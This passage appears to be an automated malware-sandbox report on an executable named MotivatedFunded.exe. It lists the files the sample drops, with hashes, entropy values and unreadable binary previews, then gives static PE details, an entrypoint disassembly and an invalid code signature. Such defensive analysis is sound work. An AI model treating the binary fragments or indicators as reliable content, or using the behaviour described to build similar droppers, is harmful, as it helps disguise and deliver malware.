                                                                  Preview:G;m..>...7.1..i...........,.'E..z..;..>C.Z6+....G.}FW.q..#~j.H.M.g.....U.#,...X6.Q.Bp.....{n.>..`.........`%...Pm..D....IUgU;y.C.^....dT.........y.=.4......z....5[9..A...F..Xy.g.[.&.):...=...Sd....C.,[.F+.Z.',..0p..1...eO._..........n.....x..8...N..p..y.cRg;.y.rPvR.N.J&..uI..P....I../..{E.\.M.hlP...CI..2.{T..\]z...X..0G...z.'..M..;K^M.}+.V..3..?.a....|th.<...J.i.?.l.@$.....{..E9Q....Y.AM.....^.|...e@.....a.qg.....w`.._.GS....j..g.{.3M@:|.X8A.QB.[..H...[C5...c.x....L.7%7.....J.o...UH"vR..&&.{..x.S5...."...=h.L....sa..\.....9.......2a.x...W....).|x...l.#9....y....@.[....$....r}...|0.(e...6. G.V..|........L..&.Z..NJd1..j+..9.aB.0.._u........../$[X=....(..c.../...a..O.weK"@.]E.o......3Q7`(s.<.g.).{.*.O..odL.w...Q'.(.-.....w....3-MQ.=......es.?..MM^g.o./.b...JL6.n...j..F/)..J..2...Iz.Iaak%e.....@...?..:..PkLDZ3%M2b.qm ...<.G=.f......Io...@.:..?.. .u.:5.)7../.e..lkR...K.\..a....AM.....lEw.....R..M...bi..Akz..z1.....xR.E~.K.....@.&6q..

                                                                  C:\Users\user\AppData\Local\Temp\Garmin

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):145408
                                                                  Entropy (8bit):6.433619123395887
                                                                  Encrypted:false
                                                                  SSDEEP:3072:lpIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTqR:OphfhnvO5bLezWWt/Dd314V14ZgP0JT
                                                                  MD5:AD02BABB05366B28E00271A60DD73416
                                                                  SHA1:06E5C9944FA53938FC6C22B2DD3880C5A3ADBE0E
                                                                  SHA-256:F73E1C7CD65B2F4ED6C00A494359CDA577F7762F689E4676F70E4B9A64219D83
                                                                  SHA-512:041B7541E1112B2D2E48231C66C720D7D2469AE1752A19131ACFBE8D39C075FFC2DFB1A9DBB0A5ABC7EDE450DD93AA1338DC0251F1FBB6FDC171A90638D805C5
                                                                  Malicious:false
                                                                  Preview:.^_3.[]...U....V.u.W.......~...F.u&.H..r....V..2...t..v..j..v....&......0...~v..j..v....>..._3.^..]...U..VW.}...G....!......R..|2...L2.t..I8.A..|2...D2.t..@8.@...G....v..G.j..H.....P...H....b...G....v..G..M..p......_3.^]...U..VW.}...j..G......P...H....zb......v..G..M..p...._3.^]...U....SV.u..~..u .F..H..^...3.C;.u..F..0...~u.....F..0...pu..2.N........^3.[..]...U..E.W...@........jdY;.w.i..................Qj.....I..=V.u.........&.3.B.V...^.H..|9...D9.t..@8.P..|9...D9.t..@8.@..3._]...U..E.j..p.P.F...]...U..E.j..p.P.1...]...U..E.VWj..p.P......u...=.#M..o....>3._.F.....^]...U..E........@.SV...W.0....}...j...t...........PS.-!....~.j.j.S....I................G.....3..7_^[....U..E.SV..@.......P..(.I...t1..$.I....Q..|2...L2.t..I8.A..|2...D2.t..@83.X......u.........3..F.....^[]...U..E........@.SV..0..W.x..s...v....N...PV.E..P._.....u..u....F.......F.........j.j.j.....I......;.uC..$.I....Q..|....L..t..I8.A..|....D..t..@8.u....@........F......>.\3..}.9.t...t..E..E....

                                                                  C:\Users\user\AppData\Local\Temp\Hardcover

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\MotivatedFunded.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):58368
                                                                  Entropy (8bit):7.996235125644935
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Ei85HATA/x81olwBXhysXdvZWa/vl0MXrWSi+OpQHyy+Y:EhDp81rBXNdvZH/tXXrWSrxSi
                                                                  MD5:1A0922E645EA7610ABD6EAFE8EDD357A
                                                                  SHA1:4B54A15D9440B3034B32FA9D798C12AAC02C6641
                                                                  SHA-256:9A86D051B47BBAEEB2CE12DAC74E52AE14F2F7043197FAC8D54EEABFAECB6C55
                                                                  SHA-512:F8AA831F9B3717C2B6B83DC7B26AB0A9A23DB12BB05BCFB5E83EBD120BB24D9C911BA90C8072850032D904B7486AD1000D2595475A94E1AF3601333F6414AE21
                                                                  Malicious:false
                                                                  Preview:..=......o.w.]..y.z.yj9~..}.x..>.@......2........w.......%....{#.......=O.........Y.....83.0..u.8s..&UC.=....D.!.....Nd....nZ~h.-3...%K."m..{..D.M.&..#...!....L..F.?.A....,$....N&..5.O...'M.....a.4a..|.:.L.T...i6D.)^...M..Y$..7.T..9.@R5fp....4.R.v.....G.vV.C.:..,}|^..X...CK4X(.sB.M..U..@...%../M..fk....2....^#..Kw.k.....Y@b5N(B.N..u.`..4...4iq.T.KP.......e....Oc..P...>.h"....AZ..>|_.....+8.6...I.fV.P:...2.....=.MB8V...!y..........X.....K.Yu..Kr.],.C=..2.kP.....k...x+.yQ...V..\..#.>....k....e.....,F./1..W$.......e.o.8.....b.[......:.;&hCZ..<....$....h.......P..Z.o..Fd........X..u.c..y.d.z...$..r^.......).S....R.t..S...ds8..'....6....w..k.W....+y:.[us..$S;|..H.F.l.YI'....;.Q....c..3.=*z...4^R..6/..<.......aJ.}%Q..... .=.yt.\...Qt.g.$.*....SR......{.|..m...7..|..HX..<...E ...s......c(.7....I\...W...HP...e.".l.kb...I..4..}....~.Jd.&.....fh.~...O.d.@U...?.:.f.u...Z0..J.I....."...6...Kz.6.m85.4....b.`pA.....! .......JO@t.b.....o....k.

                                                                  C:\Users\user\AppData\Local\Temp\Heritage

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\MotivatedFunded.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):52224
                                                                  Entropy (8bit):7.996428759632489
                                                                  Encrypted:true
                                                                  SSDEEP:1536:A+VupMNX7DToJKaDu58d+bzlo6zRxca8Z7QSQHOT:AF2NX74uTtQa8Z7QSQHOT
                                                                  MD5:7F54ABA1C1205DE6C32F7866F5C9B34F
                                                                  SHA1:13A46B11A2D7A6F35060B7795462D524B28070D3
                                                                  SHA-256:940B90EE492CE3E86102751F9DA1666B340478170D7654FDA75261413E87C5DF
                                                                  SHA-512:81704D97153549DF0CACD72F10AFCDE46D9380A903B700351F300CF3403D9110BC92F3430B89617BCB057E24DE65978B78CFE11FE65F62A9F03F893D860BF481
                                                                  Malicious:false
                                                                  Preview::..*.&..&u.......\..R.z!..c.Y....C..........n.|i-u."...!....T...c`b....................."\..S....c.%^P..!..B.....Q...S..e....,....(...fpf|.[.Py...(\.....wN<....%.....G.C"/...w....G9G..=&Z.....S...M....K'.....+7/..].k.iS9...o.O.......B.$.SO.,....(.f?G.@..*..y=.GA...zD%n...;.'5........:Du....0l.......h`.x.:..&..A...9.+....$.~Kr.c.y...<.V..l..._.P......&x.|..\....+.!.'..{.y...+.......|.Q:....6U....p........HD":./.m#...v0._E]B.^f>....aL.U..)!1g.Y&.z.....m...vv0u#..<c.%.p.C^..#R.~.Af..n.J.@....^.....8mb..i`........6....._j.$.6.E./H.<c.W..Z.Ts.;.}....7".+.a..>...g3T..=..\.......3..T.k.. .j.........2..%-........U3.M:.hU$u$.Sq.B...."..$.....ro./.2).b.:Z.?.F.M..X...i&.~.ewp7.K.6.um...=~...._.x..~.3..w.nM..wZ:1a.tda.....2.B.1Bn}....H........G.VP..h.....`..@.........a......./.RAg~'cM..p..e.V.R.7...O....R...H....{......(.B.....m.~..B.b...I.D+98.k.....\K.:.gs.a.*.9....%....|.J..G&.....h.....).\;.gA...F..JQ....a#..x.Ed.1..`.0@,..<.6.v.*&.N..e.vg.6..

                                                                  C:\Users\user\AppData\Local\Temp\Msg

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):138240
                                                                  Entropy (8bit):6.624008306422071
                                                                  Encrypted:false
                                                                  SSDEEP:3072:APnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBY:APj0nEo3tb2j6AUkB0CThp6vmVnK
                                                                  MD5:CA17C7C134DA83E28493EDAE94C73EBF
                                                                  SHA1:5DFCF136496EC6F1BB4C0AD39488E29C9205E03D
                                                                  SHA-256:69FE66E45E5049510D520A16C35A11D333BA4B82154E3BC5C32CBAD10BE7DAA3
                                                                  SHA-512:C122C588F0E8A2CA1D50F208B7E1CA8DE3236662D766D07F265631CAAEA39BAFA7682D8A05C6F72AA9B9C4D950B1FBA5158BB1405921E317DF227287350C3FBC
                                                                  Malicious:false
                                                                  Preview:.M.3................U....~8...f...j.Q.. .I..=...RQ.. .I..F8..,.......tT..7tA...t9...t$.........R.V9....I.j.j..6..X.I......Q.F9.....I......R..j.Q..T.I.......~8.......WQ.. .I..M..........W3...u.Wh4wL.....I...S....I...t.j.S.. .I.S.}.....I.........WV.5h.I.....}.....I.j.S.E...5l.I.j.P.u..E...j.W.u...j..u.W..S....I...u\.=..I.PPPj...5..I.Pj...j.j.j.j...Pj...3.PPPj...Pj...j.j.j.j...Pj...S....I..5l.I..}..t.j...j.[...].j..u..u...j.W.u...j..u.W....j.[.._............u.........X...2...........X...........B.......t.........X...2...........X..........................X.....D...PS....I........t...+....0...f;.u.......u.3.....................@..Hj........j........F.XP.F......YY.......U...E..V....8.I.t.j.V....YY..^]...U..}..V..t#.....}....u..8....t...............^].....V......;.....u#3..~............x.;0}.A...;.|..^.2.^.U..QQV.1W.~...tF......t=......S3..~+.........M..................M.....M....u...[....._^..V........~.=....t.H....V.............^.U..V..W.................}...;...........

                                                                  C:\Users\user\AppData\Local\Temp\QMHIG2HAV6E5TZ1IA.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):36
                                                                  Entropy (8bit):3.8537006129630296
                                                                  Encrypted:false
                                                                  SSDEEP:3:hGQRALjVLeJKuWJu:hCVLWqu
                                                                  MD5:A1CA4BEBCD03FAFBE2B06A46A694E29A
                                                                  SHA1:FFC88125007C23FF6711147A12F9BBA9C3D197ED
                                                                  SHA-256:C3FA59901D56CE8A95A303B22FD119CB94ABF4F43C4F6D60A81FD78B7D00FA65
                                                                  SHA-512:6FE1730BF2A6BBA058C5E1EF309A69079A6ACCA45C0DBCA4E7D79C877257AC08E460AF741459D1E335197CF4DE209F2A2997816F2A2A3868B2C8D086EF789B0E
                                                                  Malicious:false
                                                                  Preview:This content is no longer available.

                                                                  C:\Users\user\AppData\Local\Temp\Spas

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):105472
                                                                  Entropy (8bit):6.3844243791970365
                                                                  Encrypted:false
                                                                  SSDEEP:3072:pdgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgFY:bgQaE/loUDtf0accB3gY
                                                                  MD5:A8B094B6BF100EAA5C9EFDCE71F9B0F0
                                                                  SHA1:034937194CD2ED127993BCF2593314A1E4BE0849
                                                                  SHA-256:DCB175A4FBFD20482AAB77F064651AB79FE0BD3935D55E067690F608C16F1EB6
                                                                  SHA-512:7871484326A0ABB1AC444DF0F160ACEF78A48AA60639F1C2F055FD0DA052401468E591F6DCF8B6F412FB8A743AF5FA0CA0D9FE1D5739D362CFC0160C9A5B299D
                                                                  Malicious:false
                                                                  Preview:.................O..q...t.Q.....w..G............4....N.;............nN.....t...........]..R....E....C.............M...H......O...$.(*A.............O...............ER...7...........7........xO...................].......E....F...................E....;E...MN..;...EN.........H......T...$.P*A........x...........U...E.....M...E.....;E...NK..;...FK.........[.......v.......[..h.........O.......W....O...............................O...7...........%....v..0...Hj....~.............F..F.@....#O........3.F...............Q.w....N.....E...M....Q.6P.s....M...............G..X........[............S........S............S........R.......w....R........R.......d............v..........R...7...........F............_^3.[..]........BN.......W...<N...........=.....................2.....F........H..........$.x*A....c.......Z...;...|....N......u........P..................S.......*A..$..*A......V.......1....7........u...S...l....q...........h....$..*A....N...V...]....M...H..........$..*

                                                                  C:\Users\user\AppData\Local\Temp\Sport

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):147456
                                                                  Entropy (8bit):6.665780268312797
                                                                  Encrypted:false
                                                                  SSDEEP:3072:d4CE0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtM:WClbfSCOMVIPPL/sZ7HS3zcM
                                                                  MD5:0BE61213DB7572E2EB99466AF7667F57
                                                                  SHA1:A05C1E84C848D6D917622F7F0ECFA53FE67F7B9A
                                                                  SHA-256:9584802CF23C3BFE57011B353E6D1528897CAA2BBF84132478BDA5B85A0491DD
                                                                  SHA-512:896897019EEBE7AA3F0C6E1325FE56DA427D9BF7933AAB5BAF9FDC9D5C729B62A19EA533269F14BE6B0D12D0B9427598F33BC25E36667E80FE90F3B845FFC459
                                                                  Malicious:false
                                                                  Preview:}..t.....J.....p.J.[...u*;.~&....!W..I.....E.Yt..4...J....4.l.J..u kE$<.E(k.<.E,i......E0.}..u..5..L....L..=..L._^..]...L..E.P.5..L.....Y..uDiE.........L......L.y....\&.....L.....\&.;.|.+.....L.....L..=..L..j.j.j.j.j..n....U....SV......e....e...E.P.]..B...Y.........E.P.....Y..........."M..u...t4....:.u...t..X.:Y.u.........u.3............D....].R..o..Y..Q...A..u.+.A.P."~..j..."M..o....."M.YY..........W.y...A..u.+.V.A.PR.n.............j._WVj@.3.................>.t.F...u..>-_....t.FV...Yi......M...<+t.<0|.<9..F..>:uBFV...k.<Y.M...M...<9..F..<0}..>:u.FV.a...Y.M...M...<9..F..<0}...t...M.3.8.....E...E.t.j.Vj@.p..N........t.. .@.....u..M....0.u..7....0^[..].3.PPPPP..l....U....SV.%.....3.E..].P.]..]..m...Y...."....E.P.....Y.........E.P.....Y.........5."M..4n....."M...$."M.....I..........k.."M.<..l"M.W3.G.=."M..M.f9.^"M.t.k.<..M.f9.."M.t..."M...t.+.}.k.<.E....]..].. ......E.PSj?.6j.h."M.SW....I...t.9].u....X?.......E.PSj?.v.j.hp"M.SW....I._..t.9].u..F..X?...F....u..

                                                                  C:\Users\user\AppData\Local\Temp\Sv

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):35945
                                                                  Entropy (8bit):7.16659687475096
                                                                  Encrypted:false
                                                                  SSDEEP:768:X9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:XATGODv7xvTphAiPChgZ2kOE6
                                                                  MD5:1F299BC63CCB9A2B8C9FC2132B57F8D5
                                                                  SHA1:859134580A5F5DD5947B58E9EC5D9B3D6DB95338
                                                                  SHA-256:F328D00DFD12FC13869154560FFA5F43BC25D2B52CEAE5F5740F6CB3068895BB
                                                                  SHA-512:CA00CAF38B3471FE232D4DB90E8F9C19ACB735DD3FF6E97C32E4A13C91C278494E2BB2FBDDD7A092445B76E8FE897DB935E6A57A36CB2C008AC3BB89C2FB5D3F
                                                                  Malicious:false
                                                                  Preview:3j3u3}3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.4.4.4.4.4%4/494D4L4P4V4Z4`4j4t4~4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.4.5.5.5.5%5)5/595C5M5X5`5d5j5n5t5~5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6'6/63696=6C6M6W6a6l6t6x6~6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7.7&707;7C7G7M7Q7W7a7k7u7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8.8 8&808:8D8O8W8[8a8e8k8u8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9&9*90949:9D9N9X9c9k9o9u9y9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:':2:::>:D:H:N:X:b:l:w:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;.;.;';1;;;F;N;R;X;\;b;l;v;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.<.<.<.<!<'<+<1<;<E<O<Z<b<f<l<p<v<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=)=1=5=;=?=E=O=Y=c=n=v=z=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>.>.>(>2>=>E>I>O>S>Y>c>m>w>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.?.?"?(?2?<?F?Q?Y?]?c?g?m?w?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?...P..4....0.0.0 0(0,02060<0F0P0Z0e0m0q0w0{0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.1.1.1)141<1@1F1J1P1Z1d1n1y1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2.2.2)23

                                                                  C:\Users\user\AppData\Local\Temp\Vg

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\MotivatedFunded.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):7.996707919225722
                                                                  Encrypted:true
                                                                  SSDEEP:1536:4AJgmT2SXBBQcWWpU5aoDCq2vNXLMG27pTDughLP:FT2SRBQHWpUfDCq2l/8P
                                                                  MD5:1CB9F720505BC0885996FEA2782E4E66
                                                                  SHA1:73F37228E97F5969755DACDE3D4773E4B62D50BF
                                                                  SHA-256:BEB3EB1CA7DAE2D96DD0DB7DA4E2F72151FA3CF29BE999AE57356A04F276A22C
                                                                  SHA-512:DD4C2368E298D66FF19A7C0E3BA53624D520BF1DEDFEFD205D90BDFBA1D9B5E7D6C0FC83662A3BB50B7AF8AD4B95A0C5B5FF9D3BD3516DBC8D4E10DB5D0021DB
                                                                  Malicious:false
                                                                  Preview:.Mggm....(.{..].R...vR......M.a......q...m. ...J....y...eF.pvv...WW-...s{...A4.z.Y..%....m.W.$k......~..\wYtuI...;..3.E.y........d.~c.7Z4.....V...S.......2......q.&.[...G.\.Y..(..cc...9c.x...(Q.o.y.."&..,...h4..D.$ag..j@1..r...qX.........W.\..c6A...?..#.,$w.I<!T._.).4e.m*......@Cr$.:f..]...)....u!.IJ.I.O.}..@.....P..;.].........H..q"..Nk..._.@..7OL.......X.m./.i4;...q....{7.@v"*{..?...t...1.GF.."n...]...z....A..JE.c....+.D.>g...{.r./n...........)..V=..Ga.. .&d....#.$\dN.\.>a..)....=.2..q...].tH....=.C.X..u..;{a..H.~...c.pB...i.3...0_o..yE.....c..,`....=...`.L...H:.a.gG.`^...m...5....K..h)....nN...3.>w.%.Z...j...|.@so.A\.....[K.....1.g`.......@.u.A..m...&.kt;']..J.R.....ds.Dw...9.Z7O.7....-.hr.........Z....(P...r(.4.9u..)".5...Cb..u.}.....f.D...D........eH.....pxWzo...b..[Xu?....0t@.;.....~6._.x....(.m.@..3%..E.L.W.....^L.}.....,'..s t....\.....[...lBc..s...Bhp.W..U.^U..7f.......r.._...'.p.!C...=I......l........@.`.Y.+t..m..x.b..Q.C.b...

                                                                  C:\Users\user\AppData\Local\Temp\Warriors

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):6.5490665891078725
                                                                  Encrypted:false
                                                                  SSDEEP:1536:B/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzx:9g5PXPeiR6MKkjGWoUlJUN
                                                                  MD5:96F6F6B5BB98AF8AAD30572776A16E2A
                                                                  SHA1:CD05AA32F5FF9F72EB204251DD73B950A5C20203
                                                                  SHA-256:FB082B3E245E1FF010B546140D35D550A89A206EC5B8AABF854CD64708C6240F
                                                                  SHA-512:A7B1DF05076BF49827BE1D61918931EDCE7F572B612430FA8B61EF5FB31D5FDA9911E459ADD946ABC6B87B3ABC8DB90387447C419295640167AC1643B01B0F70
                                                                  Malicious:false
                                                                  Preview:}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np.....

                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1835008
                                                                  Entropy (8bit):4.4189737880103
                                                                  Encrypted:false
                                                                  SSDEEP:6144:8Svfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:nvloTMW+EZMM6DFyn03w
                                                                  MD5:095334E941CF663A54DAB58588F77BF9
                                                                  SHA1:0144BF98CF2CDBA35FAC245138D82F481F484F45
                                                                  SHA-256:DE57AC93CDD9F9CA54EB93A1E714BF050B43B2F55DED42928664BD97103035FC
                                                                  SHA-512:C2D114E6C2BFEAD04FE1AD55FD93714829A1EA075F81EB9C2A07B232856106AF14968DF13F7D285CD559EB7ED52EB1585678DD41EEDD32C18E7E0B09D3BB3F00
                                                                  Malicious:false
                                                                  Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.\*p^g................................................................................................................................................................................................................................................................................................................................................=D........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.9829928471215545
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:MotivatedFunded.exe
                                                                  File size:1'158'388 bytes
                                                                  MD5:374ec1e6084a7e4e8ce505c8eb54d157
                                                                  SHA1:03328b03975f5ee6eb5859347f59d7ef50493016
                                                                  SHA256:fc380182364b976cfd43503a92fe630b0709b0478fdf88adff07357bd692149e
                                                                  SHA512:4328e6e298632565f944fdd81e84e4b52e31e20edb5760dfad251f761c17d4818677ac0d60e9dbf2c2b6634c68b0522925fcc2f44e3bd947663ce1ad41bbe161
                                                                  SSDEEP:24576:ERkuPyTLS0vk7J5ZFuQolYd9KAHCHGBYzqVwSM7jIzyDqfDOZOugt3w3:WkuP90v4FuQolYd9aHCtwSQ0zyDqfDOl
                                                                  TLSH:DC352392C5F4CC22E9A24D3239D94A677E71B1200960C4C7530DDE9ABB80761EF6D7AF
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8.....

                                                                  File Icon

                                                                  Icon Hash:faf8f8e4c2d2c51a

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x403883
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                  Authenticode Signature

                                                                  Signature Valid:false
                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                  Error Number:-2146869232
                                                                  Not Before, Not After
                                                                  • 17/08/2022 02:00:00 30/07/2025 01:59:59
                                                                  Subject Chain
                                                                  • CN=Glarysoft Ltd, O=Glarysoft Ltd, S=Beijing, C=CN, SERIALNUMBER=91110108680456115E, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.1=Haidian District, OID.1.3.6.1.4.1.311.60.2.1.2=Beijing, OID.1.3.6.1.4.1.311.60.2.1.3=CN
                                                                  Version:3
                                                                  Thumbprint MD5:C4229BD22B53E32D95C0C71A271EDAA1
                                                                  Thumbprint SHA-1:61D425BC54E26E971EF09688ACD4493CF9081405
                                                                  Thumbprint SHA-256:C7C51A6D83F45F94EFE47C8DFADDE98DC41B197408DC45A5090AB5F16DC948BD
                                                                  Serial:042814369854A85F9B8F901267C03CF2

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  sub esp, 000002D4h
                                                                  push ebx
                                                                  push ebp
                                                                  push esi
                                                                  push edi
                                                                  push 00000020h
                                                                  xor ebp, ebp
                                                                  pop esi
                                                                  mov dword ptr [esp+18h], ebp
                                                                  mov dword ptr [esp+10h], 00409268h
                                                                  mov dword ptr [esp+14h], ebp
                                                                  call dword ptr [00408030h]
                                                                  push 00008001h
                                                                  call dword ptr [004080B4h]
                                                                  push ebp
                                                                  call dword ptr [004082C0h]
                                                                  push 00000008h
                                                                  mov dword ptr [00472EB8h], eax
                                                                  call 00007F142CB6177Bh
                                                                  push ebp
                                                                  push 000002B4h
                                                                  mov dword ptr [00472DD0h], eax
                                                                  lea eax, dword ptr [esp+38h]
                                                                  push eax
                                                                  push ebp
                                                                  push 00409264h
                                                                  call dword ptr [00408184h]
                                                                  push 0040924Ch
                                                                  push 0046ADC0h
                                                                  call 00007F142CB6145Dh
                                                                  call dword ptr [004080B0h]
                                                                  push eax
                                                                  mov edi, 004C30A0h
                                                                  push edi
                                                                  call 00007F142CB6144Bh
                                                                  push ebp
                                                                  call dword ptr [00408134h]
                                                                  cmp word ptr [004C30A0h], 0022h
                                                                  mov dword ptr [00472DD8h], eax
                                                                  mov eax, edi
                                                                  jne 00007F142CB5ED4Ah
                                                                  push 00000022h
                                                                  pop esi
                                                                  mov eax, 004C30A2h
                                                                  push esi
                                                                  push eax
                                                                  call 00007F142CB61121h
                                                                  push eax
                                                                  call dword ptr [00408260h]
                                                                  mov esi, eax
                                                                  mov dword ptr [esp+1Ch], esi
                                                                  jmp 00007F142CB5EDD3h
                                                                  push 00000020h
                                                                  pop ebx
                                                                  cmp ax, bx
                                                                  jne 00007F142CB5ED4Ah
                                                                  add esi, 02h
                                                                  cmp word ptr [esi], bx

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ C ] VS2010 SP1 build 40219
                                                                  • [RES] VS2010 SP1 build 40219
                                                                  • [LNK] VS2010 SP1 build 40219

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000xe176.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1159640x5390
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
